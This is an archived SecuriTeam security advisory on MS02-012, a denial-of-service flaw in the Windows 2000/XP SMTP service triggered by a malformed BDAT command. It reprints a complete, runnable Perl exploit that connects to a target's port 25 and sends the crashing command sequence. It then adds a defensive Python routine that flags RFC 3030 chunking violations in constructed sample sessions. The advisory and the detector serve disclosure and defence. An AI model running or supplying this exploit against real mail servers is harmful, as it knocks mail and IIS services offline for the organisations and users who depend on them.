From: http://www.securiteam.com/windowsntfocus/5XP0L2A6AS.html

Summary:
An SMTP service installs by default as part of Windows 2000 server products. Exchange 2000, which can only be installed on Windows 2000, uses the native Windows 2000 SMTP service rather than providing its own. In addition, Windows 2000 and Windows XP workstation products provide an SMTP service that is not installed by default. All of these implementations contain a flaw that could enable denial of service attacks to be mounted against the service.

The flaw involves how the service handles a particular type of SMTP command used to transfer the data that constitutes an incoming mail. By sending a malformed version of this command, an attacker could cause the SMTP service to fail. This would have the effect of disrupting mail services on the affected system, but would not cause the operating system itself to fail.

exploit:
#----Begin----
#!/usr/bin/perl -w
##################
#
#
# URL: http://www.digitaloffense.net/
# EMAIL: hdm@digitaloffense.net
# USAGE: ./mssmtp_dos.pl <target ip>
#
# Summary:
#
# The Microsoft Windows 2000 Internet Mail Service is vulnerable to a
# Denial of Service attack through the BDAT command. If exploited, this
# vulnerability will cause any and all services running under IIS (the
# inetinfo.exe process) to become unavailable.
#
#
# Solution:
#
# http://www.microsoft.com/technet/security/bulletin/MS02-012.asp
#

use strict;
use IO::Socket;

my $target = shift() || "127.0.0.1";
my $port = 25;
my $rcpt = "Administrator";
my $from = "crash\@burn.com";
my $resp;

my $sock = IO::Socket::INET->new (
    PeerAddr => $target,
    PeerPort => $port,
    Proto => 'tcp'
) || die "could not connect: $!";

# expect a 2xx greeting banner before talking SMTP
my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $from\r\n";
$resp = <$sock>;

print $sock "RCPT TO: $rcpt\r\n";
$resp = <$sock>;

# the malformed transfer command the advisory describes: a BDAT chunk of
# 4 declared bytes followed by extra command text and bare CRLFs
print $sock "BDAT 4\r\n";
print $sock "b00mAUTH LOGIN\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
#----End----

Additional information
The information has been provided by H D Moore.
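A defender-side way to recognise the command pattern the PoC above drives, written as an added example for this page (not code from the advisory or from H D Moore): it audits the client side of an SMTP session against the RFC 3030 chunking rules (exactly the declared number of bytes per chunk, only BDAT/RSET/QUIT between chunks, a closing BDAT ... LAST). The two session byte strings are constructed, not captured traffic.

```python
import re

# Constructed sample sessions (client side only, not captured traffic): the
# command sequence the PoC above sends, and a well-formed CHUNKING session.
MALFORMED_SESSION = (
    b"HELO 192.0.2.10\r\nMAIL FROM: crash@burn.com\r\nRCPT TO: Administrator\r\n"
    b"BDAT 4\r\n" b"b00mAUTH LOGIN\r\n" + b"\r\n" * 7  # 4 declared bytes, then a stray command and bare CRLFs
)
WELL_FORMED_SESSION = (
    b"EHLO client.example\r\nMAIL FROM:<a@example.com>\r\nRCPT TO:<b@example.com>\r\n"
    b"BDAT 10\r\n" b"0123456789" b"BDAT 5 LAST\r\n" b"hello" b"QUIT\r\n"
)

BDAT_RE = re.compile(rb"^BDAT\s+(\d+)(\s+LAST)?\s*$", re.IGNORECASE)
ALLOWED_BETWEEN_CHUNKS = {b"BDAT", b"RSET", b"QUIT"}  # RFC 3030: only these may follow an unfinished chunk


def audit_bdat_session(stream):
    """Return a list of RFC 3030 chunking violations found in a client byte stream."""
    findings = []
    pos = 0
    open_transaction = False  # a BDAT without LAST was seen and not closed yet
    while pos < len(stream):
        end = stream.find(b"\r\n", pos)
        if end == -1:
            findings.append("trailing bytes without CRLF terminator")
            break
        line = stream[pos:end]
        pos = end + 2
        if not line.strip():
            findings.append("empty command line")
            continue
        verb = line.split(None, 1)[0].upper()
        if open_transaction and verb not in ALLOWED_BETWEEN_CHUNKS:
            findings.append("%s issued inside an open BDAT transaction"
                            % verb.decode("ascii", "replace"))
        m = BDAT_RE.match(line)
        if m:
            size = int(m.group(1))
            chunk = stream[pos:pos + size]  # exactly <size> raw bytes follow the command line
            if len(chunk) < size:
                findings.append("BDAT declared %d bytes, only %d followed" % (size, len(chunk)))
            pos += len(chunk)
            open_transaction = m.group(2) is None
    if open_transaction:
        findings.append("session ended without BDAT ... LAST")
    return findings
```

Run over the malformed session it reports the AUTH command arriving inside an open BDAT transaction, the seven empty command lines, and the missing BDAT ... LAST; the well-formed session yields no findings.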